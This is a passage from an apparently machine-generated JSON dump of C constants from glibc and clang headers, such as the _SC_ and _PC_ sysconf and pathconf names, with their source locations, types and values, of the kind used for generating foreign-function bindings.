64 }, "value": 1 }, { "tag": "const", "name": "_PC_SYMLINK_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:65:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 19 }, { "tag": "const", "name": "_PC_2_SYMLINKS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:67:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "_SC_STREAM_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:84:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "_SC_TZNAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:86:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "_SC_CLK_TCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_NGROUPS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:80:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_SC_OPEN_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:82:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_PC_SOCK_MAXBUF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "_PC_PRIO_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:49:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "_PC_REC_INCR_XFER_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "_PC_FILESIZEBITS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:53:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 13 }, { "tag": "const", "name": "_PC_REC_MIN_XFER_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:59:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "_PC_REC_MAX_XFER_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:57:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 15 }, { "tag": "const", "name": "_PC_ALLOC_SIZE_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 18 }, { "tag": "const", "name": "_PC_REC_XFER_ALIGN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:61:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 17 }, { "tag": "const", "name": "_PC_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "__PKUINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pkuintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_PC_MAX_INPUT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_PC_PATH_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_PC_PIPE_BUF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "_PC_CHOWN_RESTRICTED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:39:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "_PC_NO_TRUNC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:41:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "_PC_ASYNC_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "_PC_SYNC_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "_PC_VDISABLE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:43:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__S64_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:134:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__U64_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:135:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ULONG32_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:133:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SLONG32_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:132:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_PC_MAX_CANON", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_PC_LINK_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:27:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__ULONGWORD_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:114:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SLONGWORD_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:113:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__S32_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:111:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__U32_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:112:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__U16_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:110:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__UWORD_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:131:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SWORD_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:130:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__UQUAD_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:129:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SQUAD_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:128:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__S16_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VLBF16INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbf16intrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_BITS_TYPES_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "L_SET", "ns": 0, "location": "/usr/include/unistd.h:322:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "L_INCR", "ns": 0, "location": "/usr/include/unistd.h:323:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__TIMESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/timesize.h:24:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "L_XTND", "ns": 0, "location": "/usr/include/unistd.h:324:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "__intptr_t_defined", "ns": 0, "location": "/usr/include/unistd.h:268:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__socklen_t_defined", "ns": 0, "location": "/usr/include/unistd.h:275:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__GNUC_VA_LIST", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stdarg.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "R_OK", "ns": 0, "location": "/usr/include/unistd.h:281:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "W_OK", "ns": 0, "location": "/usr/include/unistd.h:282:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "X_OK", "ns": 0, "location": "/usr/include/unistd.h:283:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "F_OK", "ns": 0, "location": "/usr/include/unistd.h:284:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__DEFAULT_FN_ATTRS_VL128", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:1454:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ILP32_OFF32_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:96:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "-m32" }, { "tag": "const", "name": "__ILP32_OFF32_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:95:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "-m32" }, { "tag": "const", "name": "__DEFAULT_FN_ATTRS_Z", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:1457:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_GETPW_R_SIZE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:224:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 70 }, { "tag": "const", "name": "_SC_GETGR_R_SIZE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:222:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 69 }, { "tag": "const", "name": "_XBS5_LP64_OFF64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:63:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_TTY_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:228:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 72 }, { "tag": "const", "name": "__DEFAULT_FN_ATTRS_VL256", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:1462:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_V6_LP64_OFF64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:62:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_LOGIN_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:226:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 71 }, { "tag": "const", "name": "_POSIX_V7_LP64_OFF64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:61:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_THREAD_KEYS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:232:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 74 }, { "tag": "const", "name": "_XBS5_LPBIG_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:58:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_THREAD_DESTRUCTOR_ITERATIONS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:230:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 73 }, { "tag": "const", "name": "_POSIX_V6_LPBIG_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:57:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_THREAD_THREADS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:236:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 76 }, { "tag": "const", "name": "_POSIX_V7_LPBIG_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:56:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_THREAD_STACK_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:234:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 75 }, { "tag": "const", "name": "__useconds_t_defined", "ns": 0, "location": "/usr/include/unistd.h:256:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "STDERR_FILENO", "ns": 0, "location": "/usr/include/unistd.h:212:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_PII_INTERNET_STREAM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:204:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 61 }, { "tag": "const", "name": "_SC_PII_INTERNET_DGRAM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:206:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 62 }, { "tag": "const", "name": "STDIN_FILENO", "ns": 0, "location": "/usr/include/unistd.h:210:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__LP64_OFF64_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:105:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "-m64" }, { "tag": "const", "name": "_SC_PII_OSI_COTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:208:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 63 }, { "tag": "const", "name": "STDOUT_FILENO", "ns": 0, "location": "/usr/include/unistd.h:211:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__LP64_OFF64_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:104:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "-m64" }, { "tag": "const", "name": "_SC_PII_OSI_M", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:212:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65 }, { "tag": "const", "name": "__DEFAULT_FN_ATTRS_Y", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:1483:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ILP32_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:102:10", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "-m32" }, { "tag": "const", "name": "_SC_PII_OSI_CLTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:210:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "_SC_THREAD_SAFE_FUNCTIONS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:220:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 68 }, { "tag": "const", "name": "__ILP32_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/environments.h:101:10", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "-m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64" }, { "tag": "const", "name": "_SC_THREADS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:218:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 67 }, { "tag": "const", "name": "_POSIX_RAW_SOCKETS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:173:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SC_T_IOV_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:214:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 66 }, { "tag": "const", "name": "_POSIX_IPV6", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:170:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_ADVISORY_INFO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:167:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_CLOCK_SELECTION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:164:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SC_AVPHYS_PAGES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:257:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 86 }, { "tag": "const", "name": "_SC_NPROCESSORS_ONLN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:253:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 84 }, { "tag": "const", "name": "_POSIX_MONOTONIC_CLOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:161:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_POSIX_THREAD_PROCESS_SHARED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:158:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SC_PASS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:261:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 88 }, { "tag": "const", "name": "_POSIX_MESSAGE_PASSING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:155:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SC_ATEXIT_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:259:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 87 }, { "tag": "const", "name": "_POSIX_BARRIERS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:152:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SC_XOPEN_XCU_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:266:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 90 }, { "tag": "const", "name": "_SC_THREAD_ATTR_STACKADDR", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:238:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 77 }, { "tag": "const", "name": "_POSIX_TRACE_LOG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:186:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_XOPEN_CRYPT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:270:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 92 }, { "tag": "const", "name": "_POSIX_TRACE_INHERIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:185:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_THREAD_PRIORITY_SCHEDULING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:242:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 79 }, { "tag": "const", "name": "_POSIX_TRACE_EVENT_FILTER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:184:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_POSIX_TYPED_MEMORY_OBJECTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:189:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_THREAD_ATTR_STACKSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:240:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 78 }, { "tag": "const", "name": "_SC_PHYS_PAGES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:255:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 85 }, { "tag": "const", "name": "_POSIX_TRACE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:183:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_XOPEN_UNIX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:268:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 91 }, { "tag": "const", "name": "_SC_THREAD_PRIO_PROTECT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:246:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 81 }, { "tag": "const", "name": "_POSIX_THREAD_SPORADIC_SERVER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:180:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_POSIX_SPORADIC_SERVER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:179:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SC_THREAD_PRIO_INHERIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:244:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 80 }, { "tag": "const", "name": "_SC_NPROCESSORS_CONF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:251:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 83 }, { "tag": "const", "name": "_POSIX2_CHAR_TERM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:176:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SC_TIMER_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:145:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 35 }, { "tag": "const", "name": "_SC_THREAD_PROCESS_SHARED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:248:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 82 }, { "tag": "const", "name": "_SC_BC_BASE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:150:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 36 }, { "tag": "const", "name": "__GFNIINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/gfniintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_BC_DIM_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:152:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 37 }, { "tag": "const", "name": "_SC_BC_SCALE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:154:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 38 }, { "tag": "const", "name": "_SC_BC_STRING_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:156:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 39 }, { "tag": "const", "name": "_SC_COLL_WEIGHTS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:158:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 40 }, { "tag": "const", "name": "_SC_EQUIV_CLASS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:160:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 41 }, { "tag": "const", "name": "FP_ILOGBNAN", "ns": 0, "location": "/usr/include/math.h:198:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -2147483648 }, { "tag": "const", "name": "_SC_EXPR_NEST_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:162:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 42 }, { "tag": "const", "name": "__FP_LOGB0_IS_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/fp-logb.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_XOPEN_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:264:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 89 }, { "tag": "const", "name": "__FP_LOGBNAN_IS_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/fp-logb.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "FP_ILOGB0", "ns": 0, "location": "/usr/include/math.h:193:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -2147483648 }, { "tag": "const", "name": "NAN", "ns": 0, "location": "/usr/include/math.h:98:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_RTSIG_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:137:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 31 }, { "tag": "const", "name": "__GLIBC_FLT_EVAL_METHOD", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/flt-eval-method.h:27:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": 